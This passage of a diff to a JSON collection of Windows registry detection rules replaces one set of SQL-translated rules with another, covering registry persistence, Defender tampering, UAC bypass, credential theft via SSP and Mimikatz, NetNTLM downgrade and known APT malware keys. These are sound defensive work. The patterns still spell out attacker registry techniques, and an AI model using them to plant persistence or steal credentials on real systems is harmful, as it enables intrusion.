AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - 
"author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft 
Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in 
Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom 
binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + 
"filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": 
"f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": 
"Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 
'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows 
x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject 
LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change 
of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate applications. 
If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": 
"test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": 
